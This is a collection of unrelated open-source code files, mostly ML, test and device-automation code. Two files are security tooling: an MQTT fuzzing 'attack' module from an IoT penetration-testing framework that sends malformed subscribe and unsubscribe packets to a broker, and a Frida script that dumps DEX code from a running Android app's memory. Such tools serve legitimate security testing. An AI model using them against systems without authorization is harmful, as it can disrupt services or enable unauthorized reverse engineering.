self.assertEqual(response.signature, response4.signature)
self.assertEqual(response.attestation, response4.attestation)
def test_validate_run(self):
response = RunModelResponse()
response.load_from_file(exec_run)
policy = Policy.from_file(policy_file)
response.validate(
get_input(),
policy=policy,
)
# Not signed
response2 = deepcopy(response)
response2.signature = None
response2.attestation = None
with self.assertRaises(SignatureError):
response2.validate(
get_input(),
policy=policy,
)
# Quote validation
response2 = deepcopy(response)
response2.attestation.quote += b"a"
with self.assertRaises(AttestationError):
response2.validate(
get_input(),
policy=policy,
)
response2 = deepcopy(response)
response2.attestation.enclave_held_data += b"a"
with self.assertRaises(AttestationError):
response2.validate(
get_input(),
policy=policy,
)
# Payload validation
response2 = deepcopy(response)
payload = Payload.FromString(response2.payload)
payload.run_model_payload.output[0] += 0.1
response2.payload = payload.SerializeToString()
with self.assertRaises(SignatureError):
response2.validate(
get_input(),
policy=policy,
)
# Input validation
response2 = deepcopy(response)
data = deepcopy(get_input())
data[4] += 1
with self.assertRaises(SignatureError):
response2.validate(
data,
policy=policy,
)
# Using file
response.validate(
get_input(),
policy_file=policy_file,
)
def test_validate_upload(self):
response = UploadModelResponse()
response.load_from_file(exec_upload)
policy = Policy.from_file(policy_file)
model_hash = sha256(get_model()).digest()
response.validate(
model_hash,
policy=policy,
)
# Not signed
response2 = deepcopy(response)
response2.signature = None
response2.attestation = None
with self.assertRaises(SignatureError):
response2.validate(
model_hash,
policy=policy,
)
# Quote validation
response2 = deepcopy(response)
response2.attestation.quote += b"a"
with self.assertRaises(AttestationError):
response2.validate(
model_hash,
policy=policy,
)
response2 = deepcopy(response)
response2.attestation.enclave_held_data += b"a"
with self.assertRaises(AttestationError):
response2.validate(
model_hash,
policy=policy,
)
# Payload validation
response2 = deepcopy(response)
payload = Payload.FromString(response2.payload)
payload.send_model_payload.model_hash = (
b"1" + payload.send_model_payload.model_hash[1:]
)
response2.payload = payload.SerializeToString()
with self.assertRaises(SignatureError):
response2.validate(
model_hash,
policy=policy,
)
# Input validation
response2 = deepcopy(response)
new_hash = model_hash[:5] + b"1" + model_hash[6:]
with self.assertRaises(SignatureError):
response2.validate(
new_hash,
policy=policy,
)
# Using file
response.validate(
model_hash,
policy_file=policy_file,
)
|
problems/first-non-repeated-character/first-non-repeated-character-answer.py
|
lhayhurst/interview-with-python
| 201 |
62114
|
##$$## ---------- TAGS ----------- ##$$##
##$$## first,non,repeated,character
##$$## --------- ENDTAGS --------- ##$$##
###### - Write your answer below - ######
|
momentumnet-main/examples/drop_in_replacement_tutorial.py
|
ZhuFanCheng/Thesis
| 188 |
62118
|
<reponame>ZhuFanCheng/Thesis
"""
======================================================
From ResNets to Momentum ResNets 1)
======================================================
This is a tutorial to use the transform_to_momentumnet
method:
<NAME>, <NAME>, <NAME>,
<NAME>. Momentum Residual Neural Networks.
Proceedings of the 38th International Conference
on Machine Learning, PMLR 139:9276-9287
""" # noqa
# Authors: <NAME>, <NAME>
# License: MIT
from torch import nn
from momentumnet import transform_to_momentumnet
####################################
# Let us define a toy Neural Network
####################################
class ResBlock(nn.Module):
def __init__(self, functions):
super(ResBlock, self).__init__()
self.functions = functions
def forward(self, x):
for f in self.functions:
x = x + f(x)
return x
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.res_layer1 = ResBlock(
nn.Sequential(
*[
nn.Sequential(
nn.Linear(2, 10), nn.Tanh(), nn.Linear(10, 2)
)
for _ in range(3)
]
)
)
self.l1 = nn.Linear(2, 4)
self.layer2 = nn.Sequential(
*[
nn.Sequential(nn.Linear(4, 100), nn.ReLU(), nn.Linear(100, 4))
for _ in range(4)
]
)
self.l2 = nn.Linear(4, 8)
self.fc = nn.Linear(8, 10)
def forward(self, x):
out = self.res_layer1(x) # Residual
out = self.l1(out)
out = self.layer2(out) # Not Residual but same dimensions
out = self.l2(out)
out = self.fc(out)
return out
net = Net()
###################################################
# We want to transform it into its Momentum version
###################################################
###############################################################################
# The first layer 'res_layer1' preserves dimension and is residual.
# It can be accessed through net.res_layer_1.functions so we will specify
# this attribute as the "sub_layers" parameter.
# One can transform this residual block into a momentum one as follow:
mnet1 = transform_to_momentumnet(
net,
["res_layer1.functions"], # attributes of the sublayers in net
gamma=0.9,
use_backprop=False,
is_residual=True,
keep_first_layer=False,
)
###############################################################################
# Note that layer2 is not residual but also preserves dimensions.
# It can be accessed through net.layer_2 so we will specify
# this attribute as the "sub_layers" parameter.
# One can transform it in the same way setting is_residual to False.
mnet = transform_to_momentumnet(
mnet1,
["layer2"],
gamma=0.9,
use_backprop=False,
is_residual=False,
keep_first_layer=False,
)
###############################################################################
# net, mnet1, and mnet have the same parameters.
|
macarico/tasks/cartpole.py
|
bgalbraith/macarico
| 121 |
62193
|
<gh_stars>100-1000
"""
Largely based on the OpenAI Gym Implementation
https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py
"""
from __future__ import division, generators, print_function
import numpy as np
import macarico
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable as Var
class CartPoleEnv(macarico.Env):
def __init__(self):
macarico.Env.__init__(self, 2, 200)
self.gravity = 9.8
self.masscart = 1.0
self.masspole = 0.1
self.total_mass = (self.masspole + self.masscart)
self.length = 0.5 # actually half the pole's length
self.polemass_length = (self.masspole * self.length)
self.force_mag = 10.0
self.tau = 0.02 # seconds between state updates
# Angle at which to fail the episode
self.theta_threshold_radians = 12 * 2 * math.pi / 360
self.x_threshold = 2.4
# Angle limit set to 2 * theta_threshold_radians so failing observation
# is still within bounds
self.state = None
# For macarico.Env
self.actions = set(range(self.n_actions))
def _rewind(self):
self.state = torch.rand(4) * 0.1 - 0.05
self.steps_beyond_done = None
def _run_episode(self, policy):
for _ in range(self.horizon()):
a = policy(self)
if self.step(a):
break
return self._trajectory
def step(self, action):
state = self.state
x, x_dot, theta, theta_dot = state
force = self.force_mag if action == 1 else - self.force_mag
costheta = math.cos(theta)
sintheta = math.sin(theta)
temp = (force + self.polemass_length * theta_dot * theta_dot * sintheta) / self.total_mass
thetaacc = (self.gravity * sintheta - costheta * temp) / (self.length * (4.0/3.0 - self.masspole * costheta * costheta / self.total_mass))
xacc = temp - self.polemass_length * thetaacc * costheta / self.total_mass
x = x + self.tau * x_dot
x_dot = x_dot + self.tau * xacc
theta = theta + self.tau * theta_dot
theta_dot = theta_dot + self.tau * thetaacc
#self.state = (x, x_dot, theta, theta_dot)
self.state[0] = x
self.state[1] = x_dot
self.state[2] = theta
self.state[3] = theta_dot
done = x < -self.x_threshold \
or x > self.x_threshold \
or theta < -self.theta_threshold_radians \
or theta > self.theta_threshold_radians
return done
class CartPoleLoss(macarico.Loss):
def __init__(self):
super(CartPoleLoss, self).__init__('-t')
def evaluate(self, example):
return -len(example.Yhat)
#return (100 - state.t) / 100
class CartPoleFeatures(macarico.DynamicFeatures):
def __init__(self):
macarico.DynamicFeatures.__init__(self, 4)
def _forward(self, state):
return Var(state.state.view(1,1,-1), requires_grad=False)
|
tests/test_torchy.py
|
sagnik/baseline
| 241 |
62200
|
<reponame>sagnik/baseline
import pytest
import numpy as np
torch = pytest.importorskip('torch')
from baseline.utils import Offsets
from baseline.pytorch.torchy import SequenceCriterion
C = 10
B = 50
S = 20
@pytest.fixture
def lengths():
lengths = torch.randint(1, S, size=(B,)).long()
return lengths
@pytest.fixture
def logits(lengths):
logits = torch.rand(B, S, C)
for i, l in enumerate(lengths):
logits[i, l:, :] = 0
return logits
@pytest.fixture
def labels(lengths):
lab = torch.randint(1, C, size=(B, S)).long()
for i, l in enumerate(lengths):
lab[i, l:] = 0
return lab
def raw_loss(logits, labels, loss):
B, T, H = logits.size()
crit = loss(reduce=False, ignore_index=Offsets.PAD)
total_size = labels.nelement()
res = crit(logits.view(total_size, -1), labels.view(total_size))
return res.view(B, T)
def test_batch_sequence_loss(logits, labels):
loss = torch.nn.CrossEntropyLoss
raw = raw_loss(logits, labels, loss)
gold = torch.mean(torch.sum(raw, dim=1))
crit = SequenceCriterion(LossFn=loss, avg='batch')
res = crit(logits, labels)
np.testing.assert_allclose(res.numpy(), gold.numpy(), rtol=1e-6)
def test_token_sequence_loss(logits, labels, lengths):
loss = torch.nn.CrossEntropyLoss
raw = raw_loss(logits, labels, loss)
gold = torch.sum(raw) / torch.sum(lengths).to(logits.dtype)
crit = SequenceCriterion(LossFn=loss, avg='token')
res = crit(logits, labels)
np.testing.assert_allclose(res.numpy(), gold.numpy(), rtol=1e-6)
|
multimedia/gui/lvgl/lvgl_img.py
|
708yamaguchi/MaixPy_scripts
| 485 |
62208
|
<reponame>708yamaguchi/MaixPy_scripts<gh_stars>100-1000
import lvgl as lv
import lvgl_helper as lv_h
import lcd
import time
from machine import Timer
from machine import I2C
import touchscreen as ts
i2c = I2C(I2C.I2C0, freq=400000, scl=30, sda=31)
lcd.init()
ts.init(i2c)
lv.init()
disp_buf1 = lv.disp_buf_t()
buf1_1 = bytearray(320*10)
lv.disp_buf_init(disp_buf1,buf1_1, None, len(buf1_1)//4)
disp_drv = lv.disp_drv_t()
lv.disp_drv_init(disp_drv)
disp_drv.buffer = disp_buf1
disp_drv.flush_cb = lv_h.flush
disp_drv.hor_res = 320
disp_drv.ver_res = 240
lv.disp_drv_register(disp_drv)
indev_drv = lv.indev_drv_t()
lv.indev_drv_init(indev_drv)
indev_drv.type = lv.INDEV_TYPE.POINTER
indev_drv.read_cb = lv_h.read
lv.indev_drv_register(indev_drv)
# lv.log_register_print_cb(lv_h.log)
lv.log_register_print_cb(lambda level,path,line,msg: print('%s(%d): %s' % (path, line, msg)))
# Image data
with open('/flash/blue_flower_32.bin','rb') as f:
img_data = f.read()
# Pixel format: Fix 0xFF: 8 bit, Red: 8 bit, Green: 8 bit, Blue: 8 bit
# Create a screen with a draggable image
scr = lv.obj()
img = lv.img(scr)
img.align(scr, lv.ALIGN.CENTER, 0, 0)
img_dsc = lv.img_dsc_t({
'header':{
'always_zero': 0,
'w':100,
'h':75,
'cf':lv.img.CF.TRUE_COLOR
},
'data_size': len(img_data),
'data': img_data
})
img.set_src(img_dsc)
img.set_drag(False)
# Load the screen and display image
lv.scr_load(scr)
def on_timer(timer):
lv.tick_inc(5)
timer = Timer(Timer.TIMER0, Timer.CHANNEL0, mode=Timer.MODE_PERIODIC, period=5, unit=Timer.UNIT_MS, callback=on_timer, arg=None)
while True:
tim = time.ticks_ms()
lv.task_handler()
while time.ticks_ms()-tim < 5:
pass
|
script/dumpdex.py
|
4ch12dy/xadb
| 326 |
62220
|
<filename>script/dumpdex.py
import json
import os
import sys
import frida
import time
import re
if len(sys.argv) <= 1:
print("[Dumpdex]: you should pass pid/packageName")
exit()
device = frida.get_usb_device()
pkg_name = device.get_frontmost_application().identifier
# check is package or pid
pattern = re.compile(r'^\d+$', re.I)
m = pattern.match(sys.argv[1])
if m:
app_pid = sys.argv[1]
print("[Dumpdex]: you specail the pid:" + app_pid)
# if customize the pid, use this pid. Such as app has mutiple pid
if ('app_pid' in locals() or 'app_pid' in globals()) and app_pid:
session = device.attach(int(app_pid))
else:
session = device.attach(pkg_name)
else:
pkg_name = sys.argv[1]
print("[Dumpdex]: you specail the package name:" + pkg_name + ", so spawn it and sleep 50s for launch completely")
pid = device.spawn(pkg_name)
time.sleep(50);
session = device.attach(pid)
script = session.create_script(open(open(os.path.expanduser("~/.xadb/rootdir")).read().strip() + "/script/agent.js").read())
script.load()
matches = script.exports.scandex()
for dex in matches:
bs = script.exports.memorydump(dex['addr'], dex['size'])
if not os.path.exists("./" + pkg_name + "/"):
os.mkdir("./" + pkg_name + "/")
open(pkg_name + "/" + dex['addr'] + ".dex", 'wb').write(bs)
print("[Dumpdex]: DexSize=" + hex(dex['size']) + ", SavePath=./" + pkg_name + "/" + dex['addr'] + ".dex")
|
recipes/Python/576735_How_to_use_twisted_pb_FilePager/recipe-576735.py
|
tdiprima/code
| 2,023 |
62224
|
<reponame>tdiprima/code
from twisted.spread.util import FilePager
from twisted.spread.flavors import Referenceable
from twisted.internet.defer import Deferred
import os
PATH = r"C:\temp\very_large_file.exe"
### Server Side
class ResultsPager(FilePager):
def __init__(self, collector, path):
self._deferred = Deferred()
print "%s, %d bytes" % (path, os.path.getsize(path))
fd = file(path, 'rb')
FilePager.__init__(self, collector, fd, callback=self.done)
def done(self):
print "The entire file has been transferred."
self._deferred.callback(self.collector)
def wait(self):
return self._deferred
class FilePagerizer(Referenceable):
def remote_getFile(self, collector, path):
pager = ResultsPager(collector, path)
return pager.wait()
### Client Side
class SimplePageCollector(Referenceable):
def __init__(self):
self.pages = []
def remote_gotPage(self, page):
self.pages.append(page)
print "gotPage (%d bytes)" % len(page)
def remote_endedPaging(self):
print 'endedPaging'
class FilerGetter:
def __init__(self, p):
self._file_pagerizer = p
def getRemoteFile(self, path):
root, ext = os.path.splitext(os.path.basename(path))
local_path = root + '-new' + ext
return self._file_pagerizer.callRemote(
"getFile",
SimplePageCollector(), path).addCallback(self._finished, local_path)
def _finished(self, collector, path):
data = ''.join(collector.pages)
with file(path, 'wb') as f:
f.write(data)
print "write to %s, %d bytes" % (path, len(data))
if __name__ == '__main__':
import sys
from twisted.internet import reactor
from twisted.python import log
log.startLogging(sys.stdout)
PORTNO = 8123
if sys.argv[1] == 'server':
from twisted.spread.flavors import Root
from twisted.spread.pb import PBServerFactory
class SimpleRoot(Root):
def rootObject(self, broker):
return FilePagerizer()
reactor.listenTCP(PORTNO, PBServerFactory(SimpleRoot()))
elif sys.argv[1] == 'client':
from twisted.spread import pb
def getFile1(x, path):
r = FilerGetter(x)
return r.getRemoteFile(path)
from twisted.spread import util
def getFile2(x, path):
def finished(pages):
data = ''.join(pages)
root, ext = os.path.splitext(os.path.basename(path))
local_path = root + '-new' + ext
f = file(local_path, 'wb')
f.write(data)
print "%d bytes written to %s" % (len(data), local_path)
util.getAllPages(x, "getFile", path).addCallback(finished)
cf = pb.PBClientFactory()
reactor.connectTCP("localhost", PORTNO, cf)
cf.getRootObject().addCallback(getFile2, PATH)
else:
raise sys.exit("usage: %s (server|client)" % sys.argv[0])
reactor.run()
|
RecoPixelVertexing/PixelLowPtUtilities/python/StripSubClusterShapeSeedFilter_cfi.py
|
ckamtsikis/cmssw
| 852 |
62267
|
<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from RecoPixelVertexing.PixelLowPtUtilities.StripSubClusterShapeFilter_cfi import StripSubClusterShapeFilterParams
StripSubClusterShapeSeedFilter = cms.PSet(
StripSubClusterShapeFilterParams,
ComponentName = cms.string('StripSubClusterShapeSeedFilter'),
FilterAtHelixStage = cms.bool(False),
label = cms.untracked.string("Seeds"),
)
|
src/protocols/MQTT/attacks/mqtt_generation_based_fuzzing.py
|
QWERTSKIHACK/peniot
| 143 |
62346
|
<filename>src/protocols/MQTT/attacks/mqtt_generation_based_fuzzing.py
import multiprocessing
import unittest
import paho.mqtt.client as paho
import logging
import random
import signal
import struct
import time
from Entity.attack import Attack
from Entity.input_format import InputFormat
from Utils.RandomUtil import random_generated_names
class MQTTGenerationBasedFuzzingAttack(Attack):
"""
MQTT Protocol - Payload Size Fuzzer Attack module
It is created to test any MQTT device as black box test with malformed or semi-malformed inputs
"""
client = None
# Input Fields
address = None
# Misc Members
sent_message_count = 0 # Transmitted fuzzing packets
logger = None
stopped_flag = False
subscribe = paho.SUBSCRIBE
unsubscribe = paho.UNSUBSCRIBE
def __init__(self):
default_parameters = ["127.0.0.1"]
inputs = [
InputFormat("Broker Address", "address", "", str, mandatory=True)
]
Attack.__init__(self, "MQTT Generation Based Fuzzing Attack", inputs, default_parameters,
" Inject the packets which are created from the scratch\n"
" and changed by come of their bits to corrupt the content")
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s:%(levelname)s:%(name)s:%(message)s")
# Signal handler to exit from function
signal.signal(signal.SIGINT, self.signal_handler)
def signal_handler(self, sig, frame):
self.stop_attack()
def stop_attack(self):
self.logger.info("Transmitted fuzzing packet count: {0}, exitting...".format(self.sent_message_count))
self.stopped_flag = True
if (self.client is not None):
self.client.disconnect() # Close the connection before exitting
time.sleep(2) # Sleep two seconds so the user can see the message
# sys.exit(0)
def pre_attack_init(self):
self.client = paho.Client(random_generated_names.get_random_client_name())
try:
self.client.connect(self.address)
except Exception as e:
self.logger.error("Failed to connect to broker")
def send_subscribe_or_unsubscribe(self, fuzz_client, message_type, topics, dup=False, optional_remaining_length=2,
command_dup_shift_times=3, command_base_xor_part=0x2):
"""
Generic subscribe and unsubscribe packet injection functionality
:param fuzz_client: Client ot be fuzzed
:param message_type: Currently either SUBSCRIBE or UNSUBSCRIBE
:param topics: Topics in form [("my/topic", 0), ("another/topic", 2)] for SUBSCRIBE
or ["my/topic",another/topic"] for UNSUBSCRIBE
:param dup: Duplicate flag, I set it FALSE, but you can test with TRUE
:param optional_remaining_length: To exploit message content, normally MQTT header length
for SUBSCRIBE and UNSUBSCRIBE is 2 bytes
:param command_dup_shift_times: Aligning command in header, change this to create malformed messages
:param command_base_xor_part: Normally, we need to perform XOR with 0x2 to command part of MQTT Control Packet
field of the header
:type fuzz_client: mqtt.Client
:return: Tuple of queued message and local mid
"""
remaining_length = optional_remaining_length
for t in topics:
remaining_length += optional_remaining_length + len(t)
command = message_type | (dup << command_dup_shift_times) | command_base_xor_part
packet = bytearray()
packet.append(command)
fuzz_client._pack_remaining_length(packet, remaining_length)
local_mid = fuzz_client._mid_generate()
packet.extend(struct.pack("!H", local_mid))
if message_type == self.subscribe:
for t, q in topics:
fuzz_client._pack_str16(packet, t)
packet.append(q)
elif message_type == self.unsubscribe:
for t in topics:
fuzz_client._pack_str16(packet, t)
else:
self.logger.info("Unknown message type in Generation Based Fuzzing")
return (fuzz_client._packet_queue(command, packet, local_mid, 1), local_mid)
def random_topic_generator(self, message_type, possible_characters, possible_qos_values, length=10):
try:
assert length > 2
where_to_put_slash = random.randint(1, length - 1)
topic = "{0}/{1}".format(
"".join([random.choice(possible_characters) for _ in range(1, where_to_put_slash)]),
"".join([random.choice(possible_characters) for _ in range(where_to_put_slash, length)]))
if message_type == self.subscribe:
return topic, random.choice(possible_qos_values)
elif message_type == self.unsubscribe:
return topic
else:
self.logger.info("Unknown message type in Generation Based Fuzzing")
except AssertionError:
self.logger.error("Length must be greater than 2")
return "random/topic"
def run(self):
Attack.run(self)
self.pre_attack_init()
subscribe = paho.SUBSCRIBE
unsubscribe = paho.UNSUBSCRIBE
# Quality of service creator
random_qosses = [0, 1, 2]
# Currently include "A...Za...z"
random_strings = "".join([chr(_) for _ in range(65, 91)]) + "".join([chr(_) for _ in range(97, 123)])
'''
(fuzz_client, message_type, topics, dup=False, optional_remaining_length=2,
command_dup_shift_times=3, command_base_xor_part=0x2):
'''
test_cases = [
dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x2),
dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses),
self.random_topic_generator(subscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=3, command_dup_shift_times=3, command_base_xor_part=0x2),
dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=5, command_base_xor_part=0x2),
dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x5),
dict(message_type=unsubscribe,
topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x2),
dict(message_type=unsubscribe,
topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses),
self.random_topic_generator(unsubscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=3, command_dup_shift_times=3, command_base_xor_part=0x2),
dict(message_type=unsubscribe,
topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=5, command_base_xor_part=0x2),
dict(message_type=unsubscribe,
topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses)]
, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x5)
]
for test_case in test_cases:
if self.stopped_flag is True:
break
self.send_subscribe_or_unsubscribe(
self.client, test_case["message_type"], test_case["topics"],
test_case["dup"], test_case["optional_remaining_length"],
test_case["command_dup_shift_times"], test_case["command_base_xor_part"]
)
# Increment sent message count
self.sent_message_count += 1
self.logger.info("Test case {0} has been run in generation based fuzzing".format(str(test_case)))
time.sleep(1)
class TestMQTTGenerationBasedFuzzingAttack(unittest.TestCase):
def setUp(self):
self.mqtt_generation_based_fuzzer = MQTTGenerationBasedFuzzingAttack()
def tearDown(self):
pass
def test_name(self):
self.assertEqual("MQTT Generation Based Fuzzing Attack", self.mqtt_generation_based_fuzzer.get_attack_name())
def test_inputs(self):
inputs = self.mqtt_generation_based_fuzzer.get_inputs()
self.assertIsNotNone(inputs)
self.assertGreater(len(inputs), 0, "Non inserted inputs")
self.assertEquals(len(inputs), 1)
def test_non_initialized_inputs(self):
inputs = self.mqtt_generation_based_fuzzer.get_inputs()
for _input in inputs:
value = getattr(self.mqtt_generation_based_fuzzer, _input.get_name())
self.assertTrue(value is None or type(value) == _input.get_type())
def test_after_getting_inputs(self):
example_inputs = ["a.b.c.d"]
for index, _input in enumerate(example_inputs):
self.mqtt_generation_based_fuzzer.inputs[index].set_value(_input)
# Previously it should not be set
self.assertIsNone(self.mqtt_generation_based_fuzzer.client)
super(MQTTGenerationBasedFuzzingAttack, self.mqtt_generation_based_fuzzer).run()
inputs = self.mqtt_generation_based_fuzzer.get_inputs()
for index, _input in enumerate(inputs):
value = getattr(self.mqtt_generation_based_fuzzer, _input.get_name())
self.assertEqual(example_inputs[index], value)
def testGenerationBasedFuzzingAttack(self):
def run_attack():
example_inputs = ["127.0.0.1"]
for index, _input in enumerate(example_inputs):
self.mqtt_generation_based_fuzzer.inputs[index].set_value(_input)
try:
self.mqtt_generation_based_fuzzer.run()
except Exception as e:
self.assertTrue(False)
print "* If server is not initialized this test will not execute properly."
p = multiprocessing.Process(target=run_attack, name="Generation Based Fuzzing Attack")
p.start()
time.sleep(10)
if p.is_alive():
p.terminate()
p.join()
if __name__ == '__main__':
unittest.main()
|
tests/chainer_tests/functions_tests/normalization_tests/test_layer_normalization.py
|
zaltoprofen/chainer
| 3,705 |
62351
|
import numpy
from chainer import functions
from chainer import testing
@testing.parameterize(*(testing.product({
'batchsize': [1, 5],
'size': [10, 20],
'dtype': [numpy.float32],
'eps': [1e-5, 1e-1],
})))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ [
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:1'},
]
)
class TestLayerNormalization(testing.FunctionTestCase):
def setUp(self):
self.check_forward_options = {'atol': 1e-4, 'rtol': 1e-3}
self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
if self.dtype == numpy.float16:
self.check_forward_options = {'atol': 1e-3, 'rtol': 1e-2}
self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
def generate_inputs(self):
shape = self.batchsize, self.size
size = numpy.prod(shape) // shape[0]
x = numpy.random.uniform(-1, 1, shape).astype(self.dtype)
gamma = numpy.random.uniform(-1, 1, size).astype(self.dtype)
beta = numpy.random.uniform(-1, 1, size).astype(self.dtype)
return x, gamma, beta
def forward_expected(self, inputs):
x, gamma, beta = inputs
mean = numpy.mean(x, axis=1, keepdims=True)
var = numpy.mean(numpy.square(x - mean), axis=1, keepdims=True)
std = numpy.sqrt(var + self.eps)
y_expected = (
numpy.expand_dims(gamma, axis=0) * (x - mean) / std
+ numpy.expand_dims(beta, axis=0))
return y_expected,
def forward(self, inputs, device):
x, gamma, beta = inputs
y = functions.layer_normalization(x, gamma, beta, eps=self.eps)
return y,
testing.run_module(__name__, __file__)
|
tests/integration/test_indices.py
|
fduguet-nv/cunumeric
| 304 |
62373
|
# Copyright 2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
import numpy as np
import pytest
import cunumeric as cn
from legate.core import LEGATE_MAX_DIM
@pytest.mark.parametrize("ndim", range(0, LEGATE_MAX_DIM))
def test_indices(ndim):
dimensions = tuple(random.randint(2, 5) for i in range(ndim))
np_res = np.indices(dimensions)
cn_res = cn.indices(dimensions)
assert np.array_equal(np_res, cn_res)
np_res = np.indices(dimensions, dtype=float)
cn_res = cn.indices(dimensions, dtype=float)
assert np.array_equal(np_res, cn_res)
np_res = np.indices(dimensions, sparse=True)
cn_res = cn.indices(dimensions, sparse=True)
for i in range(len(np_res)):
assert np.array_equal(np_res[i], cn_res[i])
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv))
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/pcDevice/windows/windowsDeviceAPI.py
|
Passer-D/GameAISDK
| 1,210 |
62389
|
<filename>tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/pcDevice/windows/windowsDeviceAPI.py<gh_stars>1000+
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import time
import traceback
import logging
import win32gui
from ..iPcDeviceAPI import IPcDeviceAPI
from .APIDefine import LOG_DEFAULT
from .win32driver.capture import get_image, roi
from .win32driver.keyboard import Keyboard
from .win32driver.mouse import Mouse, MouseClickType, MouseFlag
from .win32driver.probe import Win32Probe, set_foreground_window
from .win32driver.by import QPath
class WindowsDeviceAPI(IPcDeviceAPI):
def __init__(self, platform):
IPcDeviceAPI.__init__(self, platform)
self.__logger = logging.getLogger(LOG_DEFAULT)
self._is_desktop_window = False
self._hwnd = None
self._qpath = None
self._windows_size = None
self._kwargs = {}
def Initialize(self, **kwargs):
hwnd = kwargs.get('hwnd', None)
query_path = kwargs.get('query_path', None)
window_size = kwargs.get('window_size', None)
if not hwnd and query_path is None:
hwnd = win32gui.GetDesktopWindow()
self._is_desktop_window = True
if not hwnd and query_path:
# hwnd = 0xE019DC
hwnds = Win32Probe().search_element(QPath(query_path))
cnt = len(hwnds)
if cnt > 1:
raise Exception('found multi windows by qpath(%s)' % query_path)
elif cnt == 0:
raise Exception('failed to find window by qpath(%s)' % query_path)
hwnd = hwnds[0]
if isinstance(hwnd, str) and hwnd.isdigit():
hwnd = int(hwnd)
if not win32gui.IsWindow(hwnd):
raise ValueError('hwnd(%s) is not valid' % hwnd)
if window_size:
l, t, r, b = win32gui.GetWindowRect(hwnd)
w = r - l
h = b - t
if abs(w - window_size[0]) > 50 or abs(h - window_size[1]) > 50:
raise Exception('window size is not equal, real(%s) != %s' % (str([w, h]), str(window_size)))
top_hwnd = Win32Probe().get_property(hwnd, 'TOPLEVELWINDOW')
if top_hwnd:
set_foreground_window(top_hwnd)
self._hwnd = hwnd
self._qpath = query_path
self._kwargs = kwargs
self._windows_size = window_size
return True
@property
def window_handle(self):
return self._hwnd
def DeInitialize(self):
return True
def ScreenCap(self, subrect=None):
"""
:param subrect:
:return:
"""
try:
img_data = get_image(self._hwnd)
if img_data is not None and subrect:
img_data = roi(img_data, subrect)
return img_data
except Exception as e:
self.__logger.error('screencap error: %s', e)
raise e
def _to_screen_pos(self, client_pos):
""" 将相对于窗口的坐标转成屏幕坐标
:param client_pos:
:return:
"""
if self._is_desktop_window:
return client_pos
x, y = client_pos
rc = win32gui.GetWindowRect(self._hwnd)
pt = (x + rc[0], y + rc[1])
return pt
def PressKey(self, key):
Keyboard.press_key(key)
def ReleaseKey(self, key):
Keyboard.release_key(key)
def InputKeys(self, keys, long_click_time):
# self.keyboard.inputKeys(keys)
Keyboard.input_keys(keys)
if long_click_time > 0:
time.sleep(long_click_time/1000)
def InputStrings(self, key_string):
Keyboard.input_keys(key_string)
# self.keyboard.inputString(key_string)
def MouseMove(self, px, py):
sx, sy = self._to_screen_pos((px, py))
Mouse.move(sx, sy)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.move((percent_x, percent_y))
def MouseClick(self, px, py, by_post=False):
if by_post:
Mouse.post_click(self._hwnd, px, py)
else:
sx, sy = self._to_screen_pos((px, py))
Mouse.click(sx, sy)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.click((percent_x, percent_y))
def MouseDoubleClick(self, px, py):
sx, sy = self._to_screen_pos((px, py))
Mouse.click(sx, sy, click_type=MouseClickType.DoubleClick)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.doubleclick((percent_x, percent_y))
def MouseRightClick(self, px, py):
sx, sy = self._to_screen_pos((px, py))
Mouse.click(sx, sy, MouseFlag.RightButton)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.rightclick((percent_x, percent_y))
def MouseLongClick(self, px, py, long_click_time):
"""
:param px:
:param py:
